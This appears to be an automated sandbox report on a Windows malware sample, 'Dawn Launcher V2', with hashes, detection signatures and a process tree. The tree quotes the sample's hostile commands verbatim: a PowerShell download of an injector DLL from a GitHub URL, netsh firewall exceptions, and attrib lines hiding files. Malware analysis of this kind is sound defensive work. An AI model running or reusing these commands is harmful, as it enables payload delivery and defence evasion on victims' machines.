Analysis
-
max time kernel
1s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
07/01/2024, 19:22
Static task
static1
Behavioral task
behavioral1
Sample
aa947ac87e8151f7a183a3ce9b0d5860.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
aa947ac87e8151f7a183a3ce9b0d5860.exe
Resource
win10v2004-20231222-en
General
-
Target
aa947ac87e8151f7a183a3ce9b0d5860.exe
-
Size
14.2MB
-
MD5
aa947ac87e8151f7a183a3ce9b0d5860
-
SHA1
02a6e9b5306695b60e58ff01ea8accc57759d6df
-
SHA256
ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
-
SHA512
1d77c6550e4426b9127f5887fa0b9294535bbca37e8814b2753b43b8f6e011584e3fd91917dc01b8606ea70457032f92cf6206eadef0437b9f0da50b3ddc28cd
-
SSDEEP
196608:Zu/SB9ssPSSBsElKV1bIQWfjnXVnvOlRusma7glv2Xnr6swPGOkB2bilY2nw:ug9soFplSMnF87glvQmvPlbyY
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/SInject2.dll
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/5116-1-0x00000000004A0000-0x00000000012D6000-memory.dmp disable_win_def -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 3536 netsh.exe 2368 netsh.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5040 attrib.exe 4520 attrib.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Program crash 1 IoCs
pid pid_target Process procid_target 4200 5020 WerFault.exe 103 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4520 attrib.exe 5040 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"1⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe"C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe"2⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"2⤵PID:4200
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe2⤵PID:3120
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"1⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4520
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:3564
-
C:\Users\Admin\AppData\Roaming\Dawn.exe"C:\Users\Admin\AppData\Roaming\Dawn.exe"2⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe"C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe"3⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"3⤵PID:1388
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:3536
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "3⤵PID:4492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit4⤵PID:1620
-
-
-
C:\Windows\SysWOW64\certutil.execertutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin3⤵PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 26203⤵
- Program crash
PID:4200
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"1⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5020 -ip 50201⤵PID:5072